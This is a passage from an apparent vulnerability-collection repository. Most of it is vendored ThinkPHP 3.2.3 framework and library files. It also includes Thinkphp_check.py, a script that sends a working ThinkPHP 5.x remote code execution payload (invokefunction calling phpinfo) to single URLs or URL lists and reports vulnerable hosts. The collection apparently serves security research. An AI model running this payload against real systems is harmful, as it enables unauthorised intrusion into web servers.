$object->_fetch_compile($_templatelite_include_file); 26 | array_shift($object->_confs); 27 | } 28 | else 29 | { 30 | $_compiled_output = $object->_fetch_compile($_templatelite_include_file); 31 | } 32 | 33 | $object->_inclusion_depth--; 34 | 35 | if ($object->debugging) 36 | { 37 | $object->_templatelite_debug_info[$included_tpls_idx]['exec_time'] = array_sum(explode(' ', microtime())) - $object->_templatelite_debug_info[$included_tpls_idx]['exec_time']; 38 | } 39 | return $_compiled_output; 40 | } 41 | 42 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/template.generate_debug_output.php: -------------------------------------------------------------------------------- 1 | _vars; 12 | ksort($assigned_vars); 13 | if (@is_array($object->_config[0])) 14 | { 15 | $config_vars = $object->_config[0]; 16 | ksort($config_vars); 17 | $object->assign("_debug_config_keys", array_keys($config_vars)); 18 | $object->assign("_debug_config_vals", array_values($config_vars)); 19 | } 20 | 21 | $included_templates = $object->_templatelite_debug_info; 22 | 23 | $object->assign("_debug_keys", array_keys($assigned_vars)); 24 | $object->assign("_debug_vals", array_values($assigned_vars)); 25 | $object->assign("_debug_tpls", $included_templates); 26 | $object->assign("_templatelite_debug_output", ""); 27 | 28 | $object->_templatelite_debug_loop = true; 29 | $object->_templatelite_debug_dir = $object->template_dir; 30 | $object->template_dir = TEMPLATE_LITE_DIR . "internal/"; 31 | $debug_output = $object->fetch("debug.tpl"); 32 | $object->template_dir = $object->_templatelite_debug_dir; 33 | $object->_templatelite_debug_loop = false; 34 | return $debug_output; 35 | } 36 | 37 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/CREDITS: -------------------------------------------------------------------------------- 1 | XXTEA PHP extension 2 | Ma Bingyao (andot@coolcode.cn) 3 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/README: -------------------------------------------------------------------------------- 1 | XXTEA PHP extension 2 | 3 | What is it? 4 | ----------------------------------------------- 5 | This extension based on xxtea library, which provides a set of functions 6 | for encrypt or decrypt data with XXTEA algorithm. 7 | 8 | 9 | 10 | How to install it? 11 | ----------------------------------------------- 12 | See INSTALL for installation instructions. 13 | 14 | 15 | 16 | How to use it? 17 | ----------------------------------------------- 18 | string xxtea_encrypt(string data, string key) 19 | 20 | Encrypt data using XXTEA algorithm. The key is a 16 bytes(128 bits) string. 21 | 22 | string xxtea_decrypt(string data, string key) 23 | 24 | Decrypt data using XXTEA algorithm. The key is a 16 bytes(128 bits) string. 25 | 26 | string xxtea_info() 27 | 28 | Get the version information. -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/config.m4: -------------------------------------------------------------------------------- 1 | PHP_ARG_ENABLE(xxtea, xxtea module, 2 | [ --enable-xxtea Enable xxtea module.]) 3 | 4 | if test "$PHP_XXTEA" != "no"; then 5 | PHP_NEW_EXTENSION(xxtea, php_xxtea.c xxtea.c, $ext_shared) 6 | AC_DEFINE(HAVE_XXTEA, 1, [Have XXTEA library]) 7 | fi 8 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/config.w32: -------------------------------------------------------------------------------- 1 | ARG_ENABLE("xxtea", "xxtea module", "no"); 2 | 3 | if (PHP_XXTEA != "no") { 4 | EXTENSION("xxtea", "php_xxtea.c xxtea.c"); 5 | } 6 | 7 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/php_xxtea.h: -------------------------------------------------------------------------------- 1 | /*********************************************************************** 2 | 3 | Copyright 2006-2007 Ma Bingyao 4 | 5 | These sources is free software. Redistributions of source code must 6 | retain the above copyright notice. Redistributions in binary form 7 | must reproduce the above copyright notice. You can redistribute it 8 | freely. You can use it with any free or commercial software. 9 | 10 | These sources is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY. Without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 13 | 14 | You may contact the author by: 15 | e-mail: andot@coolcode.cn 16 | 17 | *************************************************************************/ 18 | 19 | #ifndef PHP_XXTEA_H 20 | #define PHP_XXTEA_H 21 | 22 | #ifdef HAVE_CONFIG_H 23 | #include "config.h" 24 | #endif 25 | 26 | #if HAVE_XXTEA 27 | extern zend_module_entry xxtea_module_entry; 28 | #define phpext_xxtea_ptr &xxtea_module_entry 29 | 30 | #define XXTEA_MODULE_NAME "xxtea" 31 | #define XXTEA_BUILD_DATE __DATE__ " " __TIME__ 32 | #define XXTEA_VERSION "1.0.3" 33 | #define XXTEA_AUTHOR "Ma Bingyao" 34 | #define XXTEA_HOMEPAGE "http://www.coolcode.cn/?p=209" 35 | 36 | ZEND_MINIT_FUNCTION(xxtea); 37 | ZEND_MSHUTDOWN_FUNCTION(xxtea); 38 | ZEND_MINFO_FUNCTION(xxtea); 39 | 40 | /* declaration of functions to be exported */ 41 | ZEND_FUNCTION(xxtea_encrypt); 42 | ZEND_FUNCTION(xxtea_decrypt); 43 | ZEND_FUNCTION(xxtea_info); 44 | 45 | #else /* if HAVE_XXTEA */ 46 | #define phpext_xxtea_ptr NULL 47 | #endif 48 | 49 | #endif /* ifndef PHP_XXTEA_H */ 50 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/php_xxtea.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 9.00 2 | # Visual Studio 2005 3 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "php_xxtea", "php_xxtea.vcproj", "{71165FA5-1EBC-4021-AA17-0CCBC7CD5204}" 4 | EndProject 5 | Global 6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 7 | Debug_php4|Win32 = Debug_php4|Win32 8 | Debug_php5|Win32 = Debug_php5|Win32 9 | Release_php4|Win32 = Release_php4|Win32 10 | Release_php5|Win32 = Release_php5|Win32 11 | EndGlobalSection 12 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 13 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Debug_php4|Win32.ActiveCfg = Debug_php4|Win32 14 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Debug_php4|Win32.Build.0 = Debug_php4|Win32 15 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Debug_php5|Win32.ActiveCfg = Debug_php5|Win32 16 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Debug_php5|Win32.Build.0 = Debug_php5|Win32 17 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Release_php4|Win32.ActiveCfg = Release_php4|Win32 18 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Release_php4|Win32.Build.0 = Release_php4|Win32 19 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Release_php5|Win32.ActiveCfg = Release_php5|Win32 20 | {71165FA5-1EBC-4021-AA17-0CCBC7CD5204}.Release_php5|Win32.Build.0 = Release_php5|Win32 21 | EndGlobalSection 22 | GlobalSection(SolutionProperties) = preSolution 23 | HideSolutionNode = FALSE 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/test/test.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/xxtea.c: -------------------------------------------------------------------------------- 1 | /*********************************************************************** 2 | 3 | Copyright 2006-2007 Ma Bingyao 4 | 5 | These sources is free software. Redistributions of source code must 6 | retain the above copyright notice. Redistributions in binary form 7 | must reproduce the above copyright notice. You can redistribute it 8 | freely. You can use it with any free or commercial software. 9 | 10 | These sources is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY. Without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 13 | 14 | You may contact the author by: 15 | e-mail: andot@coolcode.cn 16 | 17 | *************************************************************************/ 18 | #include "xxtea.h" 19 | 20 | void xxtea_long_encrypt(xxtea_long *v, xxtea_long len, xxtea_long *k) { 21 | xxtea_long n = len - 1; 22 | xxtea_long z = v[n], y = v[0], p, q = 6 + 52 / (n + 1), sum = 0, e; 23 | if (n < 1) { 24 | return; 25 | } 26 | while (0 < q--) { 27 | sum += XXTEA_DELTA; 28 | e = sum >> 2 & 3; 29 | for (p = 0; p < n; p++) { 30 | y = v[p + 1]; 31 | z = v[p] += XXTEA_MX; 32 | } 33 | y = v[0]; 34 | z = v[n] += XXTEA_MX; 35 | } 36 | } 37 | 38 | void xxtea_long_decrypt(xxtea_long *v, xxtea_long len, xxtea_long *k) { 39 | xxtea_long n = len - 1; 40 | xxtea_long z = v[n], y = v[0], p, q = 6 + 52 / (n + 1), sum = q * XXTEA_DELTA, e; 41 | if (n < 1) { 42 | return; 43 | } 44 | while (sum != 0) { 45 | e = sum >> 2 & 3; 46 | for (p = n; p > 0; p--) { 47 | z = v[p - 1]; 48 | y = v[p] -= XXTEA_MX; 49 | } 50 | z = v[n]; 51 | y = v[0] -= XXTEA_MX; 52 | sum -= XXTEA_DELTA; 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/phpRPC/pecl/xxtea/xxtea.h: -------------------------------------------------------------------------------- 1 | /*********************************************************************** 2 | 3 | Copyright 2006-2007 Ma Bingyao 4 | 5 | These sources is free software. Redistributions of source code must 6 | retain the above copyright notice. Redistributions in binary form 7 | must reproduce the above copyright notice. You can redistribute it 8 | freely. You can use it with any free or commercial software. 9 | 10 | These sources is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY. Without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 13 | 14 | You may contact the author by: 15 | e-mail: andot@coolcode.cn 16 | 17 | *************************************************************************/ 18 | 19 | #ifndef XXTEA_H 20 | #define XXTEA_H 21 | 22 | #include /* for size_t & NULL declarations */ 23 | 24 | #if defined(_MSC_VER) 25 | 26 | typedef unsigned __int32 xxtea_long; 27 | 28 | #else 29 | 30 | #if defined(__FreeBSD__) && __FreeBSD__ < 5 31 | /* FreeBSD 4 doesn't have stdint.h file */ 32 | #include 33 | #else 34 | #include 35 | #endif 36 | 37 | typedef uint32_t xxtea_long; 38 | 39 | #endif /* end of if defined(_MSC_VER) */ 40 | 41 | #define XXTEA_MX (z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[p & 3 ^ e] ^ z) 42 | #define XXTEA_DELTA 0x9e3779b9 43 | 44 | void xxtea_long_encrypt(xxtea_long *v, xxtea_long len, xxtea_long *k); 45 | void xxtea_long_decrypt(xxtea_long *v, xxtea_long len, xxtea_long *k); 46 | 47 | #endif 48 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/COPYING: -------------------------------------------------------------------------------- 1 | The MIT License 2 | 3 | Copyright (c) 2011 Vladimir Andersen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in 13 | all copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 21 | THE SOFTWARE. -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/README.md: -------------------------------------------------------------------------------- 1 | **Spyc** is a YAML loader/dumper written in pure PHP. Given a YAML document, Spyc will return an array that 2 | you can use however you see fit. Given an array, Spyc will return a string which contains a YAML document 3 | built from your data. 4 | 5 | **YAML** is an amazingly human friendly and strikingly versatile data serialization language which can be used 6 | for log files, config files, custom protocols, the works. For more information, see http://www.yaml.org. 7 | 8 | Spyc supports YAML 1.0 specification. 9 | 10 | ## Using Spyc 11 | 12 | Using Spyc is trivial: 13 | 14 | ``` 15 | =5.3.1" 18 | }, 19 | "autoload": { 20 | "files": [ "Spyc.php" ] 21 | }, 22 | "extra": { 23 | "branch-alias": { 24 | "dev-master": "0.5.x-dev" 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/examples/yaml-dump.php: -------------------------------------------------------------------------------- 1 | 'A sequence','second' => 'of mapped values'); 18 | $array['Mapped'] = array('A sequence','which is mapped'); 19 | $array['A Note'] = 'What if your text is too long?'; 20 | $array['Another Note'] = 'If that is the case, the dumper will probably fold your text by using a block. Kinda like this.'; 21 | $array['The trick?'] = 'The trick is that we overrode the default indent, 2, to 4 and the default wordwrap, 40, to 60.'; 22 | $array['Old Dog'] = "And if you want\n to preserve line breaks, \ngo ahead!"; 23 | $array['key:withcolon'] = "Should support this to"; 24 | 25 | $yaml = Spyc::YAMLDump($array,4,60); 26 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/examples/yaml-load.php: -------------------------------------------------------------------------------- 1 | spyc.yaml loaded into PHP:
'; 15 | print_r($array); 16 | echo ''; 17 | 18 | 19 | echo '
YAML Data dumped back:
';
20 | echo Spyc::YAMLDump($array);
21 | echo '
'; 22 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/php4/5to4.php: -------------------------------------------------------------------------------- 1 | ', $code); 13 | $f = fopen ($dest, 'w'); 14 | fwrite($f, $code); 15 | fclose ($f); 16 | print "Written to $dest.\n"; 17 | } -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/tests/comments.yaml: -------------------------------------------------------------------------------- 1 | foo: 'bar' #Comment 2 | arr: ['x', 'y', 'z'] # Comment here 3 | bar: kittens -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/tests/failing1.yaml: -------------------------------------------------------------------------------- 1 | MyObject: 2 | Prop1: {key1:val1} -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/tests/indent_1.yaml: -------------------------------------------------------------------------------- 1 | root: 2 | child_1: 2 3 | 4 | child_2: 0 5 | child_3: 1 6 | 7 | root2: 8 | child_1: 1 9 | # A comment 10 | child_2: 2 11 | 12 | displays: 13 | - resolutions: 14 | 1024: 768 15 | - resolutions: 16 | 1920: 1200 17 | 18 | display: 19 | - resolutions: 20 | 1024: 768 21 | 1920: 1200 22 | producer: "Nec" 23 | 24 | nested_hashes_and_seqs: 25 | - { row: 0, col: 0, headsets_affected: [{ports: [0], side: left}], switch_function: {ics_ptt: true} } 26 | 27 | easier_nest: { h: [{a: b, a1: b1}, {c: d}] } 28 | 29 | one_space: | 30 | By four 31 | spaces 32 | 33 | steps: 34 | - step: &id001 35 | instrument: Lasik 2000 36 | pulseEnergy: 5.4 37 | pulseDuration: 12 38 | repetition: 1000 39 | spotSize: 1mm 40 | - step: 41 | <<: *id001 42 | spotSize: 2mm 43 | 44 | death masks are: 45 | sad: 2 46 | <<: {magnificent: 4} 47 | 48 | login: &login 49 | adapter: mysql 50 | host: localhost 51 | 52 | development: 53 | database: rails_dev 54 | <<: *login 55 | 56 | "key": "value:" 57 | colon_only: ":" 58 | 59 | list_and_comment: [one, two, three] # comment 60 | kai: 61 | -example: value 62 | kai_list_of_items: 63 | - -item 64 | - '-item' 65 | -item -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/spyc/tests/quotes.yaml: -------------------------------------------------------------------------------- 1 | html_tags: 2 | -
3 | -

4 | html_content: 5 | -

hello world

6 | - hello
world 7 | text_content: 8 | - hello world -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Mode/Sae/convention.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | /** 13 | * SAE模式惯例配置文件 14 | * 该文件请不要修改,如果要覆盖惯例配置的值,可在应用配置文件中设定和惯例不符的配置项 15 | * 配置名称大小写任意,系统会统一转换成小写 16 | * 所有配置参数都可以在生效前动态改变 17 | */ 18 | defined('THINK_PATH') or exit(); 19 | $st = new SaeStorage(); 20 | return array( 21 | //SAE下固定mysql配置 22 | 'DB_TYPE' => 'mysql', // 数据库类型 23 | 'DB_DEPLOY_TYPE' => 1, 24 | 'DB_RW_SEPARATE' => true, 25 | 'DB_HOST' => SAE_MYSQL_HOST_M.','.SAE_MYSQL_HOST_S, // 服务器地址 26 | 'DB_NAME' => SAE_MYSQL_DB, // 数据库名 27 | 'DB_USER' => SAE_MYSQL_USER, // 用户名 28 | 'DB_PWD' => SAE_MYSQL_PASS, // 密码 29 | 'DB_PORT' => SAE_MYSQL_PORT, // 端口 30 | //更改模板替换变量,让普通能在所有平台下显示 31 | 'TMPL_PARSE_STRING' => array( 32 | // __PUBLIC__/upload --> /Public/upload -->http://appname-public.stor.sinaapp.com/upload 33 | '/Public/upload' => $st->getUrl('public','upload') 34 | ), 35 | 'LOG_TYPE' => 'Sae', 36 | 'DATA_CACHE_TYPE' => 'Memcachesae', 37 | 'CHECK_APP_DIR' => false, 38 | 'FILE_UPLOAD_TYPE' => 'Sae', 39 | ); 40 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Mode/api.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | /** 13 | * ThinkPHP API模式定义 14 | */ 15 | return array( 16 | // 配置文件 17 | 'config' => array( 18 | THINK_PATH.'Conf/convention.php', // 系统惯例配置 19 | CONF_PATH.'config'.CONF_EXT, // 应用公共配置 20 | ), 21 | 22 | // 别名定义 23 | 'alias' => array( 24 | 'Think\Exception' => CORE_PATH . 'Exception'.EXT, 25 | 'Think\Model' => CORE_PATH . 'Model'.EXT, 26 | 'Think\Db' => CORE_PATH . 'Db'.EXT, 27 | 'Think\Cache' => CORE_PATH . 'Cache'.EXT, 28 | 'Think\Cache\Driver\File' => CORE_PATH . 'Cache/Driver/File'.EXT, 29 | 'Think\Storage' => CORE_PATH . 'Storage'.EXT, 30 | ), 31 | 32 | // 函数和类文件 33 | 'core' => array( 34 | MODE_PATH.'Api/functions.php', 35 | COMMON_PATH.'Common/function.php', 36 | MODE_PATH . 'Api/App'.EXT, 37 | MODE_PATH . 'Api/Dispatcher'.EXT, 38 | MODE_PATH . 'Api/Controller'.EXT, 39 | CORE_PATH . 'Behavior'.EXT, 40 | ), 41 | // 行为扩展定义 42 | 'tags' => array( 43 | ), 44 | ); 45 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Mode/lite.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | /** 13 | * ThinkPHP Lite模式定义 14 | */ 15 | return array( 16 | // 配置文件 17 | 'config' => array( 18 | MODE_PATH.'Lite/convention.php', // 系统惯例配置 19 | CONF_PATH.'config'.CONF_EXT, // 应用公共配置 20 | ), 21 | 22 | // 别名定义 23 | 'alias' => array( 24 | 'Think\Exception' => CORE_PATH . 'Exception'.EXT, 25 | 'Think\Model' => CORE_PATH . 'Model'.EXT, 26 | 'Think\Db' => CORE_PATH . 'Db'.EXT, 27 | 'Think\Cache' => CORE_PATH . 'Cache'.EXT, 28 | 'Think\Cache\Driver\File' => CORE_PATH . 'Cache/Driver/File'.EXT, 29 | 'Think\Storage' => CORE_PATH . 'Storage'.EXT, 30 | ), 31 | 32 | // 函数和类文件 33 | 'core' => array( 34 | MODE_PATH.'Lite/functions.php', 35 | COMMON_PATH.'Common/function.php', 36 | CORE_PATH . 'Hook'.EXT, 37 | CORE_PATH . 'App'.EXT, 38 | CORE_PATH . 'Dispatcher'.EXT, 39 | //CORE_PATH . 'Log'.EXT, 40 | CORE_PATH . 'Route'.EXT, 41 | CORE_PATH . 'Controller'.EXT, 42 | CORE_PATH . 'View'.EXT, 43 | ), 44 | // 行为扩展定义 45 | 'tags' => array( 46 | ), 47 | ); 48 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Tpl/dispatch_jump.tpl: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 10 | 跳转提示 11 | 21 | 22 | 23 |
24 | 25 |

:)

26 |

27 | 28 |

:(

29 |

30 | 31 |

32 |

33 | 页面自动 跳转 等待时间: 34 |

35 |
36 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Tpl/think_exception.tpl: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | 系统发生错误 10 | 26 | 27 | 28 |
29 |

:(

30 |

31 |
32 | 33 |
34 |
35 |

错误位置

36 |
37 |
38 |

FILE:  LINE:

39 |
40 |
41 | 42 | 43 |
44 |
45 |

TRACE

46 |
47 |
48 |

49 |
50 |
51 | 52 |
53 |
54 |
55 |

ThinkPHP { Fast & Simple OOP PHP Framework } -- [ WE CAN DO IT JUST THINK ]

56 |
57 | 58 | 59 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/logo.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "topthink/thinkphp", 3 | "description": "the ThinkPHP Framework", 4 | "type": "framework", 5 | "keywords": ["framework","thinkphp","ORM"], 6 | "homepage": "http://thinkphp.cn/", 7 | "license": "Apache2", 8 | "authors": [ 9 | { 10 | "name": "liu21st", 11 | "email": "liu21st@gmail.com" 12 | } 13 | ], 14 | "require": { 15 | "php": ">=5.3.0" 16 | }, 17 | "minimum-stability": "dev" 18 | } 19 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/index.php: -------------------------------------------------------------------------------- 1 | 10 | // +---------------------------------------------------------------------- 11 | 12 | // 应用入口文件 13 | 14 | // 检测PHP环境 15 | if(version_compare(PHP_VERSION,'5.3.0','<')) die('require PHP > 5.3.0 !'); 16 | 17 | // 开启调试模式 建议开发阶段开启 部署阶段注释或者设为false 18 | define('APP_DEBUG',True); 19 | 20 | // 定义应用目录 21 | define('APP_PATH','./Application/'); 22 | 23 | // 引入ThinkPHP入口文件 24 | require './ThinkPHP/ThinkPHP.php'; 25 | 26 | // 亲^_^ 后面不需要任何代码了 就是如此简单 -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/POC.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/POC.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/Thinkphp_check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # GetShell Tools author: Bearcat 4 | 5 | import sys 6 | import requests 7 | 8 | def send_payload(target): 9 | payload = [r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"] 10 | targets = target + payload[0] 11 | header_list = { 12 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0', 13 | } 14 | 15 | try: 16 | request = requests.get(target) 17 | if request.status_code == 404: 18 | print "[-] 404 not found " + target 19 | else: 20 | results = requests.get(targets,headers=header_list,timeout=3).text 21 | r = requests.get(targets,verify=False,timeout=6).text 22 | if 'PHP Version' in r: 23 | print "[+] exists " + target 24 | else: 25 | print "[-] don't exists " + target 26 | except requests.ConnectionError: 27 | print "[-] Cannot connect url " + target 28 | 29 | def read_url_list(files): 30 | for line in open(files): 31 | send_payload(line[:-1]) 32 | 33 | if __name__ == '__main__': 34 | print "\n[*] Start Check...\n" 35 | if sys.argv[1] == "-u": 36 | send_payload(sys.argv[2]) 37 | elif sys.argv[1] == "-f": 38 | file = sys.argv[2] 39 | read_url_list(file) -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/run_Thinkphp_check.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/CMS-Hunter/5ad0da9524b385045e7a4a627d2bb52906badfc5/ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/run_Thinkphp_check.png -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | composer.lock 3 | *.log 4 | thinkphp 5 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/thinkphp_5.0.22_with_extend/LICENSE.txt: -------------------------------------------------------------------------------- 1 | 2 | ThinkPHP遵循Apache2开源协议发布,并提供免费使用。 3 | 版权所有Copyright © 2006-2017 by ThinkPHP (http://thinkphp.cn) 4 | All rights reserved。 5 | ThinkPHP® 商标和著作权所有者为上海顶想信息科技有限公司。 6 | 7 | Apache Licence是著名的非盈利开源组织Apache采用的协议。 8 | 该协议和BSD类似,鼓励代码共享和尊重原作者的著作权, 9 | 允许代码修改,再作为开源或商业软件发布。需要满足 10 | 的条件: 11 | 1. 需要给代码的用户一份Apache Licence ; 12 | 2. 如果你修改了代码,需要在被修改的文件中说明; 13 | 3. 在延伸的代码中(修改和有源代码衍生的代码中)需要 14 | 带有原来代码中的协议,商标,专利声明和其他原来作者规 15 | 定需要包含的说明; 16 | 4. 如果再发布的产品中包含一个Notice文件,则在Notice文 17 | 件中需要带有本协议内容。你可以在Notice中增加自己的 18 | 许可,但不可以表现为对Apache Licence构成更改。 19 | 具体的协议参考:http://www.apache.org/licenses/LICENSE-2.0 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 22 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 23 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 24 | FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 25 | COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 26 | INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 27 | BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 28 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 29 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 30 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN 31 